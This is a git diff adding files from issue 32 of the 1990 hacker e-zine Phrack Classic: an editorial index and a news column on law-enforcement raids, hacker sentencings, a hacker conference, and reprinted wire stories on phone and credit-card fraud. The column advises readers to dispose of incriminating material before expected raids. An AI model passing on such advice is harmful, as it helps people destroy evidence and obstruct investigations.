+What's been uncovered so far, says Holtzen, may be "just the tip of the
+iceberg."
+                              [END OF STORY]
+_______________________________________________________________________________
diff --git a/phrack32/1.txt b/phrack32/1.txt
new file mode 100644
index 0000000..92fdc8f
--- /dev/null
+++ b/phrack32/1.txt
@@ -0,0 +1,63 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #1 of XX
+
+                  Phrack Classic Newsletter Issue XXXII Index
+                  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+                               November 17, 1990
+
+  Over the past year we have seen MANY changes in the Phreak/Hack community.
+We felt the heat of Operation Sun Devil, watched are friends become public
+scapegoats of the 'hacker world', and watched in anger as the lawyers have
+tried to smash us and put us out like an old cigarette.  Almost everyday I
+hear about someone who just got 'busted' for one reason or another.  This
+makes me sit back and think.  If people go to jail for hacking, and hackers
+know this, then why does it continue?  Ahhh... an unsolved mystery.  Maybe I
+should call Time Life Books.  No, I don't think so.
+  Anyways, I am pleased to announce a new era in electronic publications.  A
+new age for a new age.  Ladies and gentleman (Trumpet Fanfare Added Here),
+Phrack Classic.  Phrack Classic takes off where Phrack left off.  For those
+of you who have read Phrack then you might remember me as the editor for a
+while.  Well, now I am doing Phrack Classic to try to release a newsletter
+that really describes what the Phreak/Hack world is like here in the 1990's.
+  People ask me why I am writing a hacker magazine, and they look down on me
+for my attempt.  I feel Phrack Classic is written for hackers, yes, but I also
+feel that a hacker is one "who enjoys pushing the envelope, bypassing limits,
+discovering knowledge, inventing solutions, <and> adventuring into uncharted
+areas."  So is it so wrong to publish a newsletter for the exchange of free
+information?  No, I don't think so.
+  Anyone is welcome to submit an article for Phrack  Classic, and I encourage
+everyone to do so.  I hope you enjoy this issue and I look forward to bringing
+you many more in the not so distant future.  Stay safe and be free.  See you
+at Ho Ho Con!
+
+
+                                                    Crimson Death
+                                                    Editor of Phrack Classic
+
+
+(Quote taken from the Hackers 6.0 Conference Brochure)
+
+
+If you have a question, an article submission, or you just wanna say
+hello. Send mail to Crimson Death and Doc Holiday at:
+
+
+                                 pc@well.uucp
+_______________________________________________________________________________
+
+
+                              Table of Contents:
+
+  1.  Phrack Classic XXXII Index by Crimson Death
+  2.  Phrack Classic Spotlight featuring Knight Lightning by Crimson Death
+  3.  Concerning Hackers Who Break Into Computer Systems by Dorthy Denning
+  4.  The Art of Investigation by Butler
+  5.  Unix 'Nasties' by Sir Hackalot
+  6.  Automatic Teller Machine Cards by Jester Sluggo
+  7.  A Trip to the NCSC by Knight Lightning
+  8.  Inside the SYSUAF.DAT File by Pain Hertz
+  9.  RSTS by Crimson Death
+  10-12.  Knight Line I/Parts 1-3 by Doc Holiday
+_______________________________________________________________________________
diff --git a/phrack32/10.txt b/phrack32/10.txt
new file mode 100644
index 0000000..26f4270
--- /dev/null
+++ b/phrack32/10.txt
@@ -0,0 +1,830 @@
+                              ==Phrack Classic==
+
+                     Volume Three, Issue 32, File #10 of 12
+
+
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                              K N I G H T L I N E
+
+                              Issue 001 / Part I
+
+                            17th of November, 1990
+
+                              Written, compiled,
+
+                           and edited by Doc Holiday
+
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                                      ---
+
+    Welcome to the 5th year of Phrack and the first edition of KnightLine!
+
+                                      ---
+SunDevil II: The witch-hunt continues..
+
+I hate to start out on such a sour note, but:  Inside sources have reported an
+enormous amount of Secret Service activity in major U.S.  cities.
+Furthermore, sources claim that new investigations are underway for the
+prosecution of all Legion Of Doom members.
+
+The investigations have "turned up" new evidence that could bring about
+the sequel to SunDevil.
+
+This information comes from reliable sources and I suggest that all precautions
+should be taken to protect yourselves from a raid.
+
+Some good advice to follow:
+
+A>   Refrain from using "codes", or other means to commit toll fraud.
+
+B>   Further yourselves from those who are overwhelmed with desire to tell
+     you their recent conquests of computer systems.
+
+C>   Refrain from downloading or storing stolen Unix source code.
+
+D>   Get rid of anything that might incriminate you or your peers.
+
+E>   Stay cool, calm, and collected.
+
+
+The Conflict has submitted a file to KL about what to do IF YOU ARE raided.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                 Simple Guidelines To Follow If You Encounter
+               Law Enforcement Agents In An Unfriendly Situation
+
+     The current state of the Computer Underground is an extreme turmoil.
+     The recent threat of another series of witchhunt raids has put many
+     people into a state of paranoia, and rightfully so.  Noone needs to
+     deal with all the bullshit associated with a bust.  I am offering a
+     few guidelines to follow if you encounter a precarious situation
+     instigated by a law enforcement agent; of course, it is up to you to
+     decide what you want to do.  Of the people whom I have spoken with,
+     these will be some of the best steps to follow if you receive an
+     unexpected visit.
+
+          Probably the first thing you would want to do if you receive an
+     unfriendly visit from Joe Fed is to READ the damn warrant.  Find
+     out why you have been chosen, and what they are looking for.  Also,
+     remember that if they have only a search and seizure warrant, they
+     are warranted only to confiscate items on your premises; however, if
+     they are serving a subpoena, they may take what they need, on or off
+     your premises.  So, in essence, the clean-house preventive measure
+     may or may not be useful to you.
+
+          An important thing to do when Agent Foley (or one of his lesser
+     evil counterparts) comes knocking on your door is to cooperate fully.
+     Drop a lot of "Yes sir"/"No sir" answers; respond politely.  You're
+     in no position to be a smart ass, and being friendly surely can not
+     hurt you.
+
+          Another important thing to remember, although it is almost
+     opposite of the aforementioned, has to do with what to say.  In
+     essence, do not say a fucking thing if you are questioned!  Remember,
+     anything you say or do can and WILL be used AGAINST you in a court of
+     law.  Simply reply, "I can not answer any questions without counsel",
+     or "I first must contact my attorney."  You need not answer a damn
+     thing they ask of you without an attorney present, and it would most
+     probably be very detrimental to do so.
+
+          This hint parallels the previous one.  No matter what you do,
+     do not reply to any question with "I don't know anything", or any
+     simple derivation of that phrase.  If you do, and you are indicted,
+     you will be reamed in court.  The presence of that statement could
+     greatly damage your defense, unless you are conditionally mental or
+     something.
+
+          In essence, those are all you should need.  What I have outlined
+     is very simple, but logical.  You need to keep a level head at least
+     while they are on site with you; get pissed off/psycho later, after
+     they leave.  If you are currently an active member of the Computer
+     Underground, you may wish to lose anything that is important to you,
+     at least temporarily.  Why?  Well, the analogy I was given follows
+     that:  if you were suspected of racketeering, the feds could execute
+     a search and seizure on your property.  If they can prove by 51% that
+     ANY of the confiscated material COULD have been used in your suspected
+     racketeering, it is forfeited (i.e. you lost it, for good).  The
+     forfeiture stands whether or not you are indicted or convicted!  So,
+     you would be entirely screwed.
+
+     All of the aforementioned steps are important.  Those are all I really
+     have to offer.  I suggest that you get clean before the sweep occurs,
+     and that you stay clean until after the sweep clears.  Exercise
+     extreme caution.  Keep your head high, and keep your back to the wall
+     (otherwise, it would be quite possible to find a knife lodged in it).
+     Stay safe, and good luck!
+
+     The Conflict
+      11-13-1990
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+***UPDATE.11/16/90:  3 Hackers are DOOMED to prison
+
+     Frank Darden (Leftist), Adam Grant (Urvile), and Robert Riggs (Prophet)
+were sentenced Friday.  Robert, who was currently on probation before the
+incident was sentenced to 21 months in a federal prison.  Frank and Adam were
+received sentences of 14 months.  All three were ordered to pay $233,000 in
+restitution.
+
+     Kent Alexander, an assistant U.S. attorney who prosecuted the case, was
+not available for comment.
+
+                                      ---
+     This is not good for the Underground at all.  I'm sure the government will
+use the outcome of this to their advantage in speeding up the momentum of
+prosecuting hackers.  In their eyes, everyone is in LOD.
+
+     Dale Boll, a special agent of the Secret Service in Washington, said
+"Telephone companies are preparing for a retaliation from the hacking
+underworld and are beefing up security at all ends of the wire."
+
+     I can't verify or validate these rumors of retaliation.  But I can say if
+you are going to do some sort of retaliation, I would think twice-- It could
+make things worse.  This is not a "game" we are playing.  No, it's reality.
+And I'm sured Frank, Adam, and Rob are feeling it right now.
+                                      ---
+A few words from Erik Bloodaxe on the sentences:
+
+"I'm not surprised in the least at the sentencing.  However, I'm sure the three
+of them are.  I wish I could ask them if all the singing was worth-while in the
+long-run.  How can anyone hope to make a deal with federal officals, who with
+in the past year, resorted to such lies and deceit.  Everyday I think all this
+will be over and I can get on with my life and possibly use my own computer to
+write a term paper without fear of it's confiscation due to who or what I know
+or have seen or done in the past.  Perhaps this will end eventually, but until
+then Mr.  Cook will play on the peoples inherient fear of technology and
+exploit everyone in his past on his personal crusade for his own twisted view
+of justus.  Are you or have you ever been a member of the Legion of Doom?  Tell
+me, do you believe in reincarnation Senator McCarthy?"
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+            "The weirdest part of my dream was... when I woke up."
+
+                          And now.... .. ANNOUNCING:
+
+                               The first annual,
+
+                              X M A S C O N  '90
+
+                              Where: Houston, TX
+                         When: December 28th-30th 1990
+               Who: All Hackers, Journalists, and Federal Agents
+
+     Well, it's getting closer.. XmasCon is next month and we plan on having
+the biggest gathering of Hackers & Feds since SummerCon '88!
+
+     This event was going to be private until word got out.  A journalist
+(unnamed) found out about the private event and decided to make it public news
+in the magazine for which he writes.  Well, after seeing the words: "XMASCON"
+in a magazine with less readers than Phrack, we decided to announce it
+ourselves.  So, here it is-- Your OFFICIAL invitation to the gathering that
+should replace the painful memories of SummerCon'90 (SCon'90? What do you mean?
+there was a SummerCon this year? HA. It surprised me too).
+
+                              Hotel Information:
+                                 La Quinta Inn
+                               6 North Belt East
+                                (713) 447-6888
+                  (Located next to Intercontinental Airport)
+
+                       Fees: $44.00+TAX a night (single)
+                          $56.00+TAX a night (double)
+
+                         Government Discount (With ID)
+                          $49.00+TAX a night (single)
+                          $37.00+TAX a night (double)
+
+                                1-800-531-5900
+
+
+Call for reservations in advance.  Please tell the registar that you are with
+XmasCon'90.  Everyone is welcome to attend, and I do mean EVERYONE.
+
+
+Take care & see you at HoHoCon!
+
+                   --DH
+
+_______________________________________________________________________________
+
+                           F R O M   T H E   W I R E
+
+
+HEADLINE  Thirteen Arrested For Breaking Into University Computer
+          Byline:   PAT MILTON
+DATE      08/16/90
+SOURCE    The Associated Press (ASP)
+          Origin:   FARMINGDALE, N.Y.
+          (Copyright 1990.  The Associated Press.  All Rights Reserved.)
+
+
+* FARMINGDALE, N.Y.  (AP) _ Thirteen computer hackers ranging in age from 14 to
+32 were charged Thursday with breaking into the mainframe computer at a
+university in Washington state and causing costly damage to the files.  One of
+the suspects is a 14-year-old high school student from New York City who is
+also a suspect in last November's break-in of an Air Force computer in the
+Pentagon, according to Senior Investigator Donald Delaney of the New York State
+Police.  The student, who used the name "Zod" when he signed onto the computer,
+is charged with breaking into the computer at the City University of Bellevue
+in Washington in May by figuring out the toll-free telephone number that gave
+students and faculty legitimate  access to the system.
+
+"Zod," who was not identified because he is a minor, maintained control over
+the system by setting up his own program where others could illegally enter the
+system by answering 11 questions he set up.
+
+More than 40 hackers across the country are believed to have gained illegal
+access to the system since May, Delaney said.  As a result of the break-in,
+university files were altered and deleted, and consultants must be hired to
+reprogram the system, Delaney said.  In addition to the arrests, search
+warrants were executed at 17 locations on Thursday where officers confiscated
+$50,000 worth of computers and related equipment.  Three more arrests were
+expected.  Two of the 13 arrested were from Long Island and the rest were from
+the New York boroughs of Brooklyn, Queens, Manhattan and the Bronx.
+Farmingdale is on Long Island.  The 13 were charged with computer tampering,
+computer trespass, unauthorized use of a computer and theft of services.  The
+juveniles will be charged with juvenile delinquency.
+
+The investigation began two months ago after a technician at the university
+noticed "error message" flashing on the computer screen, indicating someone had
+entered the system illegally.  The suspects were traced through subpoenaed
+telephone records.  * Many hackers break into private computer systems for the
+pure satisfaction of cracking the code, and also to obtain sometimes costly
+computer programs, Delaney said.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+
+
+_______________________________________________________________________________
+
+
+HEADLINE  US Sprint helps business customers battle PBX fraud
+DATE      09/25/90
+SOURCE    BUSINESS WIRE (BWR)
+
+
+KANSAS CITY, Mo.--(BUSINESS WIRE)--US Sprint Wednesday announced its corporate
+security department will help the company's business customers battle PBX
+fraud.  After producing significant results in fighting code abuse US Sprint is
+directing their efforts to help their business customers in identifying and
+preventing computer hackers from infiltrating their business customer's owned
+or leased telephone switching equipment.  ``Unauthorized use of our
+long-distance service has been greatly reduced through increased detection,
+prevention, investigation and prosecution efforts,'' said Bob Fox, US Sprint
+vice president corporate security.
+
+``Now rather than attacking a long-distance carrier's network in * an attempt
+to steal authorization codes, computer hackers are attacking private companies'
+and governmental agencies' Private Branch Exchanges (PBX's).  Computer
+hackers break into private telephone switches in an attempt to reoriginate
+long-distance calls, which are then billed to the businesses.  Fox says a
+business may not discover its telephone system has been ``hacked'' until their
+long-distance bill is received and then it may be too late.  Help is on the way
+however.  US Sprint has started a customer support program to help the
+company's business customers to combat the situation.  Del Wnorowski, US Sprint
+senior vice president-general counsel said, ``The new program is customers
+about the potential for telecommunications fraud committed through their owned
+or leasesd switching equipment and to assist them in preventing this type of
+illegal activity.'' US Sprint is a unit of United Telecommunications Inc., a
+diversified telecommunications company headquartered in Kansas City.
+
+CONTACT:
+US Sprint, Kansas City.
+Phil Hermanson, 816/276-6268
+_______________________________________________________________________________
+
+
+HEADLINE  Fax pirates find it easy to intercept documents
+DATE      09/10/90
+SOURCE    Toronto Star   (TOR)
+          Edition:  METRO
+          Section:  BUSINESS TODAY
+          Page:     B4
+          (Copyright The Toronto Star)
+
+
+          ---      Fax pirates find it easy to intercept documents         ---
+
+TOKYO (Special) - Considering that several years ago enthusiastic hackers began
+breaking into computer systems worldwide to steal valuable information, it
+could only have been a matter of time before the same problem surfaced for
+facsimile machines.  Now, officials of Nippon Telegraph and Telephone Public
+Corp.  report evidence that this has been happening, not only in their own
+country but around the globe.  Apparently, anyone with just a little knowledge
+of electronics can tap fax messages being sent from one of these relatively
+unsophisticated machines to another, with the duplication printed out on the
+pirate's facsimile machine.  Both the sender and the receiver of the faxed
+document remain completely unaware that they have been bugged.  "I shudder to
+think of some of the business documents which only recently moved over my
+company's fax machines being examined by our competitors," one Tokyo executive
+nervously admits when informed that there has been a proliferation of tapping.
+"You don't think the tax people are doing it too?" he then asks in mock terror.
+
+     It is certainly a frightening thought.  The technique involves making a
+secret connection with the telephone line of the party whose fax messages are
+to be intercepted.  That is all too easy to accomplish, according to officials
+of Nippon Telegraph and Telephone.  Apart from a few special cases, very little
+has been done to guard against outside tapping.  As a result, one of the most
+vulnerable areas - and one most businessmen and women now should begin to feel
+unsure of - is the privacy or security of the facsimile machine.  Technical
+attention to this problem is in order.
+
+     "The idea that somewhere out there is 'Conan the Hacker' who is reading my
+fax correspondence as readily as I do sends chills up my spine," says one
+American businesswoman here.  "There could be a lot of trouble for me and up to
+now I didn't even realize it was possible." It is not only possible, but easy.
+Ordinary components available at any electronics store can be used.  With these
+in hand, tappers can rig up a connection that sets off a warning signal,
+without the sender or receiver realizing it, whenever a fax message passes
+along the telephone line.  Considering the growing volume of highly
+confidential material being sent and received via fax equipment, the resulting
+leaks can be considered highly dangerous to the security of corporate
+information.
+
+     In Japan alone it is estimated that there are 3.7 million
+machines in operation.  Given the nature of these tapping operations, it would
+appear to be extremely difficult for companies to determine whether they are
+suffering serious damage from this process.  In addition, it is clear that a
+great many corporations have yet to realize the extent of the threat to their
+privacy.  "If more business executives recognized what is going on," suggests
+one Japanese security specialist, "they would move now to halt the opportunity
+for leaks and thus protect their corporations from this type of violation." He
+went on to note that third parties mentioned in fax messages also can be badly
+hurt by these interceptions.  Fortunately, manufacturers are producing machines
+capable of preventing hackers from tapping into the system.  In some cases,
+newly developed fax machines use code systems to defend information
+transmitted.  But these tap-proof facsimile machines are not yet in general
+use.  Makers of the new "protected" facsimile machines predict that once the
+business communities around the globe become aware of the threat they will
+promptly place orders for replacements and junk their old equipment as a simple
+matter of damage control.  The market could prove extremely large.  Those few
+leak-proof fax machines now in operation depend upon scrambling messages, so
+that even if a pirate taps into the telephone line leading to the unit, the
+intercepted message is impossible to read.
+
+     Nippon Telegraph and Telephone, for example, claims that it would require
+a hacker using a large computer more than 200,000 years to crack the codes used
+in its own pirate-proof fax.  This ultimately may prove to be something of an
+exaggeration.  Although in Japan and many other countries this kind of tapping
+clearly is illegal, it remains nearly impossible to track down electronic
+eavesdroppers.  As far as is known, none of these snoopers have been identified
+and dragged into court.  Security specialists in Japan claim that there may be
+thousands of fax hackers who get their kicks out of intercepting and reading
+other people's business mail, with few using the information for illegal
+purposes or actively conveying it to third parties.
+_______________________________________________________________________________
+
+
+HEADLINE  Inmate behind scams
+          Byline:   JOHN SEMIEN
+DATE      09/11/90
+SOURCE    THE BATON ROUGE SUNDAY ADVOCATE   (BATR)
+          Section:  NEWS
+          Page:     1-B
+          (Copyright 1989 by Capitol City Press)
+
+
+     There wasn't much inmate Lawrence "Danny" Faires couldn't buy, sell or
+steal with a telephone call from his jail cell in Miami when his million-dollar
+fraud ring ran afoul of the U.S.  Secret Service in 1989.  That was the year
+Faires used a portable computer with an automatic dialing program to "hack out"
+access codes to the long-distance lines of Telco Communications Inc., a Baton
+Rouge-based phone company.  Telco officials were alarmed when they spotted
+1,500 attempts at gaining unauthorized access to the company's long-distance
+service in a single 12-hour period in January 1989.
+
+     Convinced that an organized fraud scheme was at work, Telco called
+Resident Agent Phil Robertson, who heads the service's Baton Rouge office.
+
+"They told me they felt they were being attacked by hackers who had discovered
+their long-distance access lines and who were hacking out personal
+identification numbers belonging to their customers," Robertson said Monday.
+
+"You are billed based on your pin (access) number.  The computer hacker had
+located several of their 800 numbers and had entered digits hoping it would be
+a valid pin number." Using computer records, Robertson said agents were able to
+isolate 6,000 fraudulent Telco calls that were made during a three-week period
+of January.  More than a third of those calls were traced to a cell block in
+the Dade County Interim Detention Center that has been home for Faires for the
+past four years.  Faires is awaiting trial in Miami on first-degree murder
+charges.  "As it turned out, all of the inmates in this cell block are awaiting
+trial," Robertson said.  "One of the inmates, Danny Faires, had a computer in
+his cell attached to a modem, and he turned out to be the hacker."
+
+"All he had to do was plug his modem in, let it make the calls and check his
+printout for the numbers that came back good," the agent said.  In checking out
+the other bogus Telco calls, agents uncovered a massive credit card scam.  A
+federal grand jury in Milwaukee, Wis., linked both scams to Faires and alleged
+associates of the inmate across the country in a Feb.  27 indictment of six
+people on federal wire and access device fraud.  Fairies, an unindicted
+co-conspirator in the case, last week said he has spent the past three years
+applying his previous experience as a computer systems analyst and programmer
+to a lap-top, portable computer provided by one of the prison guards.  He
+describes the results as "doing business with America" at the expense of large
+credit card and telecommunications companies.  Faires said he attacked Telco's
+system by chance after receiving one of the company's access numbers in a group
+of assorted access codes acquired by his associates.  "It was just their
+misfortune that we became aware that they had a system there that was easily
+accessible," Faires said in a telephone interview.
+
+     "I was given their access number, along with Sprint and MCI, I guess
+virtually every company in America we got." Faires said he used the stolen,
+long distance phone time and other stolen credit card numbers to access
+networks with credit information from major department stores and mail order
+businesses.  "You come up to the door and the door is locked," he said.  "You
+have to buy access.  Well, I bought access with credit cards from another
+system.  I had access codes that we had hacked.  "I could pull your entire
+credit profile up and just pick the credit card numbers that you still had some
+credit in them and how many dollars you had left in your account and I would
+spend that," Faires said.  "My justification was, I don't know the creditor and
+he had no knowledge of it so he won't have to pay it." However, Faires said he
+now thinks of the trouble the illegal use of the credit cards has caused his
+victims in their efforts to straighten out damaged credit records.  "I remember
+I took a course once that was called computer morality about the moral ethics
+to which we're morally bound," he said.  "It's like a locksmith.  Even though
+he can open a lock, he's morally bound not to if it's not his lock.  I violated
+that."
+
+     The vulnerability of credit card companies to hackers is the subject of an
+unpublished book that Faires said he has written.  Faires said his book
+includes tips on how businesses and others can safeguard access to their
+credit, but added that there may be no way to be completely safe from
+hackers.  "It's untitled as yet," he said about the book.  "We're leaving that
+open.  I'm waiting to see if they electrocute me here, then I'm going to put
+something about "I could buy it all but couldn't pay the electric bill.' "
+[This guy is a real toon -DH]
+
+     While Faires has not been formally charged in connection with the scheme,
+last week he said he was sure charges will be forthcoming because "there is no
+question about my involvement." The other six alleged conspirators are John
+Carl Berger and George A.  Hart Jr.  of Milwaukee, Wis.; Charles Robert McFall
+and Victor Reyes of San Antonio, Texas; Steven Michael Skender Jr.  of West
+Allis, Wis.; and Angelo Bruno Bregantini of Marshville, N.C.  All six men are
+charged with conspiracy to commit access device and wire fraud.  Berger,
+Skender, Reyes and Bregantini also are charged separately with multiple counts
+of wire fraud.
+
+     The indictments are the first criminal charges generated by Operation
+Mongoose, an ongoing Secret Service probe of credit card and long-distance
+telephone access fraud.  The charges allege that Faires has had access to a
+telephone since his arrest and imprisonment in Miami in 1986, an allegation
+that has prompted a separate probe by Miami authorities.  That phone was used
+to make frequent calls to a building on Brookfield Road in Brookfield, Wis.,
+where another alleged unindicted co-conspirator, Fred Bregantini, operates
+various businesses, according to the indictment.  The indictment said Faires
+and Fred Bregantini were "at the hub" of the telephone and credit card scam.
+The two men are accused of collecting credit card numbers and telephone access
+codes from other defendants in the case and using the numbers to purchase
+merchandise, services and "other things of value." Robertson said agents
+believe the members of the ring copied many of these stolen numbers from credit
+card receipts retrieved from the trash cans of various businesses.  He said the
+practice, commonly called "dumpster diving," is a widely used method in credit
+card fraud. [`dumpster  diving' eh? -DH]
+
+     While some of the defendants helped make purchases on the stolen cards,
+the indictment alleges that others provided addresses used for the shipment of
+the stolen goods.  The goods included gold coins, plane tickets, computer
+equipment, tools and stereo equipment.  Robertson said agents are still
+tallying the cost of the scam to Telco and other companies but that the damage
+has already climbed past $1 million.  Herbert Howard, president of Telco, on
+Friday said the company lost from $35,000 to $40,000 in revenues from illegal
+calls and in additional expenses for researching Faires' use of access codes.
+"It was really a learning experience for us because this is the first time this
+has happened," Howard said about his 2-year-old company.  "I think it's a fear
+of all long-distance companies.  It's very fortunate that we caught it as
+quickly as we did."
+_______________________________________________________________________________
+
+HEADLINE  No, I'm not paranoid, but who is No. 1?
+          Byline:   DENISE CARUSO
+          Column:   INSIDE SILICON VALLEY
+DATE      08/21/90
+SOURCE    SAN FRANCISCO EXAMINER   (SFEX)
+          Edition:  FIFTH
+          Section:  BUSINESS
+          Page:     D-16
+          (Copyright 1989)
+
+
+     THOUGH I didn't plan it that way, this week proved to be a perfect time to
+start renting old episodes of "The Prisoner" - that very dark, very paranoid
+British spy series from the early '60s which foresaw a bleak future in which
+"een-formation" was of paramount importance, no matter whose "side" you were
+on.  Every well-paid company representative from every telephone service
+provider in North America earned his or her keep this week, fielding calls from
+blood-thirsty members of the press corps who also wanted "een-formation" about
+whether or not the huge long-distance snafu with AT&T was a "hack" (an illegal
+break-in) or some form of computerized germ warfare.
+
+     I'm happy that the answer was "no," but of course the event opens a rather
+nasty can of worms:  has AT&T's problem tipped off the hacker community that
+the phone network is vulnerable?  "That's a very good question," said one
+network engineer I spoke with last week.  But, he assured me, his network was
+totally secure and had all kinds of safeguards built in to prevent either
+outside penetration or the introduction of a software virus to the system.  I
+hope he's right, but I must admit, I've heard that song before.
+
+     Here, for example, is an excerpt from an anonymous piece of electronic
+mail I received last week, slightly edited to correct grammatical
+imperfections:  "It may be of interest to you to know, if I wanted to have
+"fun," "evil" deeds could be done by remote control, up to and including
+shutting down every ESS (electronic switching station) office in North America.
+
+     "Less evil and more fun might be to shut down the stock market for a day,
+scramble all transactions, or even send it down in a tail spin!  Banks aren't
+immune either.  This may sound very darkside, but people must have what is
+needed to fight back if things go bad!" Not disturbing enough?  Try this one on
+for size:  Back in July of '89, I wrote of a story in the premier issue of the
+magazine Mondo 2000 that detailed how one might set about hacking automatic
+teller machines (ATMs).  That story contained everything but the blueprints for
+the device, which the magazine's editors didn't print because they thought it
+would be irresponsible to do so.  But now, a student-owned Cornell University
+publication called "Visions Magazine" - for which Carl Sagan is creative
+adviser - has asked the article's author, Morgan Russell, for rights to reprint
+the article in its entirety, including device blueprints.
+
+     These kinds of stories are disturbing, yet somehow I've always expected
+they would happen, a reaction that's similar to the way I feel when I watch
+"The Prisoner." No.  6, as he's called, cries out at the beginning of every
+episode, "I am not a number!  I am a free man!" His will to resist is
+sufficient to fend off the authorities who believe their need for the
+"een-formation" in No.  6's head gives them the right to try to control his
+movements and thoughts, using - of course - only the most impressive
+technology.
+
+     Of course, the science-fiction fantasy of impressive technology in the
+'60s, when "The Prisoner" was created, was as authoritarian and centralized as
+the governments using it.  Not many faceless authorities back then were
+predicting a near-future where all classes of people had access to, could
+afford and knew how to use powerful technology.  (I'm sure it would have ruined
+their supper if they had.) Neither did they envision today's growing class of
+technological sophisticates - whether self-taught PC hackers or trained
+computer scientists - who, by virtue of their knowledge, could cripple,
+disable, or otherwise confound the system which spawned them.  Have any opinion
+you'd like about the right or wrong of it.  Fact is, whether it's the phone
+network or a bank teller machine, the more we rely on technology, the less we
+can rely on technology.
+
+     Though this fact can make life unpleasant for those of us who are
+victimized by either the machines we trust or the people who know how to fidget
+with them, there is something strangely comforting about knowing that, after
+all, a computer is still only as trustworthy as the humans who run it.  Write
+
+CONTACT:
+Denise Caruso, Spectra, San Francisco Examiner
+P.O  Box 7260
+San Francisco, CA 94120.   (Denise
+
+MCI Mail (Denise Caruso) - CompuServe (73037,52) - CONNECT (Caruso)
+_______________________________________________________________________________
+
+HEADLINE  US Sprint to Supply Soviet Venture With Switches
+DATE      09/17/90
+SOURCE    WALL STREET JOURNAL (WJ)
+
+
+WASHINGTON -- US Sprint Communications Corp.  said it obtained U.S.  government
+approval to supply a Soviet joint venture with packet switches that can greatly
+improve telecommunications services between the Soviet Union and other
+countries.  The imminent shipment of these switches was announced by William
+Esrey, chairman and chief executive officer of United Telecommunications Inc.,
+shortly after completing a visit to the Soviet Union with Commerce Secretary
+Robert Mosbacher and the chief executives of other U.S.  companies.  United
+Telecommunications is the parent of US Sprint.
+
+      The export license that US Sprint expects to obtain as early as this week
+will be the first license for telecommunications equipment granted by the U.S.
+under the new, relaxed regulations for shipping technology to the Soviet Union,
+Esrey said.  * The Soviet venture, Telenet USSR, will be owned by a US Sprint
+subsidiary, Sprint International, and the Soviet Ministry of Post and
+Telecommunications and the Larvian Academy of Sciences, a Soviet research
+group.  The Commerce Department doesn't discuss details of individual license
+applications, but Mosbacher has publicly supported technology tie-ups between
+the U.S.  companies represented in his traveling group and potential Soviet
+partners.  US Sprint appears to be leading the race among American
+telecommunications companies to establish solid ties in the Soviet Union.  An
+earlier proposal by U S West Inc.  to lay down part of an international
+fiber-optic line across the Soviet Union was rejected by U.S.  authorities
+because of the advanced nature of the technology.
+
+     US Sprint's packet switches, however, appear to be within the new
+standards for permissible exports to the Soviet Union.  The switches are used
+to route telephone calls and control traffic in voice, facsimile and
+digitalized data transmission.  These eight-bit switches are one or two
+generations behind the comparable systems in use in Western countries, but are
+still good enough to sharply improve the ability of Sprint's Soviet customers
+to communicate with other countries, Esrey's aides said.  The company declined
+to discuss the value of its investment or to disclose how many switches will be
+sold.  US Sprint said its venture will operate through new, dedicated satellite
+lines that will augment the often-congested 32 international lines that
+currently exist for Moscow-based businesses.  Esrey said he expects the venture
+to be in operation before the end of this year.
+_______________________________________________________________________________
+
+HEADLINE  BT Tymnet Introduces Additional XLINK Services
+DATE      09/09/90
+SOURCE    DOW JONES NEWS WIRE
+
+SAN JOSE, Calif.  -DJ- BT Tymnet Inc.  said XLINK Express, a family of new,
+bundled, port-based, synchronous X.25 (XLINKs) services, is available.  The
+XLINK service offers customers lower cost X.25 host access to its TYMNET
+network, the company said in a news release.  XLINKs are leased-line private
+access port services for X.25 interfaces at speeds up to 19.2 bits per second
+and supporting up to 64 virtual circuits.
+
+XLINK Express includes port access, leased line, modems, software, and free
+data transmission.  Prior to XLINK Express, customers requiring a
+9.6-bit-per-second leased line for standard X.25 host connectivity would
+typically pay about $1,500 monthly for their leased line, modems and interface.
+With XLINK, customers can now be charged a monthly rate of $900, the company
+said.
+
+BT Tymnet Inc.  is a unit of British Telecom plc.
+_______________________________________________________________________________
+
+HEADLINE  Hacker may be taunting the FBI; Whiz suspected of invading U.S. army
+          computer
+          Credit:   PENINSULA TIMES TRIBUNE
+DATE      04/10/90
+SOURCE    Montreal Gazette   (GAZ)
+          Edition:  FINAL
+          Section:  NEWS
+          Page:     F16
+          Origin:   PALO ALTO, Calif.
+          (Copyright The Gazette)
+
+          --- Hacker may be taunting the FBI; Whiz suspected of invading
+                                   U.S. army computer                       ---
+
+PALO ALTO, Calif.  - The computer prodigy wanted on suspicion of invading a
+U.S.  army computer may be taunting FBI agents by defiantly talking to his
+hacker buddies on electronic bulletin boards while he eludes a manhunt,
+authorities said.  The mysterious Kevin Poulsen, a former Menlo Park, Calif.,
+resident described by many as a computer genius, is outsmarting the FBI and
+apparently has the savvy to make this game of hide-and-seek a long contest.
+
+     No, investigators are not getting frustrated, FBI official Duke Diedrich
+said.  "It's just a matter of time.  We've got our traps and hopefully one day
+we'll be able to get the mouse." Authorities have issued an arrest warrant for
+the former SRI International computer expert.  He has been at large since at
+least Jan.  18, when federal officials revealed allegations of a sensational
+computer conspiracy.  The FBI says Poulsen, 24, is the mastermind of a complex
+computer and telephone-system invasion that included breaking into an
+unclassified army computer network, snooping on the FBI and eavesdropping on
+the calls of a former girlfriend.  FBI agents believe he may be in southern
+California, but because he is apparently still hooked up to a national network
+of hackers, he could be using his friends to hide just about anywhere, Diedrich
+said.  Poulsen is adept at manufacturing false identification and knows how to
+use the phone system to cover traces of his calls.
+
+     Agents believe his hacker talk on electronic bulletin boards is perhaps "a
+way of taunting law enforcement officials," Diedrich said.  Poulsen may be back
+to his old tricks, but "he's not hiding with the usual bunch of hackers," said
+John Maxfield, a computer security consultant and former FBI informant.
+
+     Maxfield, known nationally as a "narc" among young hackers, said he had
+underground sources who said Poulsen was rumored to be living alone in a
+southern California apartment.  Poulsen's computer chatter could lead to his
+downfall, Maxfield said.  Many hackers are electronic anarchists who would be
